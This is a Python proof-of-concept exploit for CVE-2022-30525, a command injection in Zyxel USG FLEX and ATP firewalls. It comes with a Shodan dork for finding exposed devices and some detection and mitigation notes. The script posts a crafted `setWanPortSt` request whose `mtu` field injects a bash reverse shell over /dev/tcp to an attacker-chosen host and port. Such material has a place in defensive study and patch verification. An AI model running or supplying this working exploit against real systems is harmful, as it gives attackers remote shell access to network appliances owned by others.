# Exploit Title: Zyxel USG FLEX 5.21 - OS Command Injection
# Shodan Dork: title:"USG FLEX 100" title:"USG FLEX 100W" title:"USG FLEX 200" title:"USG FLEX 500" title:"USG FLEX 700" title:"USG20-VPN" title:"USG20W-VPN" title:"ATP 100" title:"ATP 200" title:"ATP 500" title:"ATP 700" title:"ATP 800"
# Date: May 18th 2022
# Exploit Author: Valentin Lobstein
# Vendor Homepage: https://www.zyxel.com
# Version: ZLD5.00 thru ZLD5.21
# Tested on: Linux
# CVE: CVE-2022-30525
"""Proof of concept for CVE-2022-30525 (Zyxel ZLD, see header for affected versions).

What the script relies on: the unauthenticated `/ztp/cgi-bin/handler` endpoint
accepts a JSON `setWanPortSt` command and passes the `mtu` field to a shell
without sanitising it, so a value beginning with `;` is executed as a command
on the appliance.

Defender notes (derived from the request this script sends):
  * Detection: a POST to `/ztp/cgi-bin/handler` whose JSON body has
    `"command": "setWanPortSt"` and a non-numeric `mtu` (an MTU should be an
    integer; here it starts with `;` and contains `bash`) is a high-fidelity
    signature for web-server / WAF logs. An outbound TCP connection from the
    firewall to an unexpected host immediately after such a request is the
    follow-on indicator.
  * Mitigation: apply the vendor's fixed firmware (version not given on this
    page) and keep the ZTP/management endpoints off untrusted networks.
"""

from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import json
import base64
import requests
import argparse

# All three options default to None when omitted; main() refuses to run
# unless every one of them was supplied.
parser = argparse.ArgumentParser(
    prog="CVE-2022-30525.py",
    description="Example : python3 %(prog)s -u https://google.com -r 127.0.0.1 -p 4444",
)
parser.add_argument("-u", dest="url", help="Specify target URL")
parser.add_argument("-r", dest="host", help="Specify Remote host")
parser.add_argument("-p", dest="port", help="Specify Remote port")
# Module-level side effect: argument parsing happens at import time, not in main().
args = parser.parse_args()

# Base64-encoded ASCII-art banner; decoded and printed by main().
banner = (
    "ICwtLiAuICAgLCAsLS4gICAgICwtLiAgICwtLiAgLC0uICAsLS4gICAgICAsLS0sICAsLS4gIDs"
    "LS0nICwtLiAgOy0tJyAKLyAgICB8ICAvICB8ICAgICAgICAgICApIC8gIC9cICAgICkgICAgKSAg"
    "ICAgICAvICAvICAvXCB8ICAgICAgICkgfCAgICAKfCAgICB8IC8gICB8LSAgIC0tLSAgIC8gIHwg"
    "LyB8ICAgLyAgICAvICAtLS0gIGAuICB8IC8gfCBgLS4gICAgLyAgYC0uICAKXCAgICB8LyAgICB8"
    "ICAgICAgICAgLyAgIFwvICAvICAvICAgIC8gICAgICAgICAgKSBcLyAgLyAgICApICAvICAgICAg"
    "KSAKIGAtJyAnICAgICBgLS0nICAgICAnLS0nICBgLScgICctLScgJy0tJyAgICAgYC0nICAgYC0n"
    "ICBgLScgICctLScgYC0nICAKCVJldnNoZWxscwkoQ3JlYXRlZCBCeSBWYWxlbnRpbiBMb2JzdGVp"
    "biA6KSApCg=="
)


def main() -> None:
    """Validate the CLI arguments, build the handler URL and call exploit().

    Exits with status 0 (after printing usage) when any of -u/-r/-p is missing.
    """
    print("\n" + base64.b64decode(banner).decode("utf-8"))
    # argparse leaves unsupplied options as None, so any None means an option is missing.
    if None in vars(args).values():
        print(f"[!] Please enter all parameters !")
        parser.print_help()
        sys.exit()
    # Substring test, not a prefix test: "http" anywhere in the string is taken
    # as "a scheme is present".
    if "http" not in args.url:
        args.url = "https://" + args.url
    # The vulnerable endpoint; the global args.url is mutated and later re-read by exploit().
    args.url += "/ztp/cgi-bin/handler"
    exploit(args.url, args.host, args.port)


def exploit(url: str, host: str, port: str) -> None:
    """Send the crafted setWanPortSt request to *url*.

    Args:
        url: full URL of the ZTP handler endpoint.
        host: address the injected command connects back to.
        port: TCP port for that connection (a string, straight from argparse).

    Side effects: prints progress to stdout, disables the urllib3 insecure-request
    warning globally, and calls sys.exit(1) on timeout or Ctrl-C.
    """
    headers = {
        "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0",
        "Content-Type": "application/json",
    }
    data = {
        "command": "setWanPortSt",
        "proto": "dhcp",
        "port": "4",
        "vlan_tagged": "1",
        "vlanid": "5",
        # Injection point. A legitimate MTU is an integer; this value starts with
        # `;` so the handler's shell runs the rest as a separate command. For
        # detection, a non-numeric `mtu` in this request body is the thing to alert on.
        "mtu": f'; bash -c "exec bash -i &>/dev/tcp/{host}/{port}<&1;";',
        "data": "hi",
    }
    # Certificate verification is turned off below (verify=False) and its warning
    # silenced here — presumably because the appliance serves a self-signed
    # certificate; not confirmed by anything on this page.
    requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
    # Reads the global args.url rather than the url parameter.
    print(f"\n[!] Trying to exploit {args.url.replace('/ztp/cgi-bin/handler','')}")
    try:
        response = requests.post(
            url=url, headers=headers, data=json.dumps(data), verify=False, timeout=5
        )
    except (KeyboardInterrupt, requests.exceptions.Timeout):
        print("[!] Bye Bye hekcer !")
        sys.exit(1)
    finally:
        # NOTE: `finally` also runs on the except path above (SystemExit is an
        # exception), where `response` was never bound. The resulting NameError
        # is swallowed by the bare `except`, so the "Enjoy your shell" line is
        # printed after a timeout, and the status-code line only when the server
        # answered within 5 s. The bare `except` also hides any other error.
        try:
            print("[!] Can't exploit the target ! Code :", response.status_code)
        except:
            print("[!] Enjoy your shell !!!")


if __name__ == "__main__":
    main()

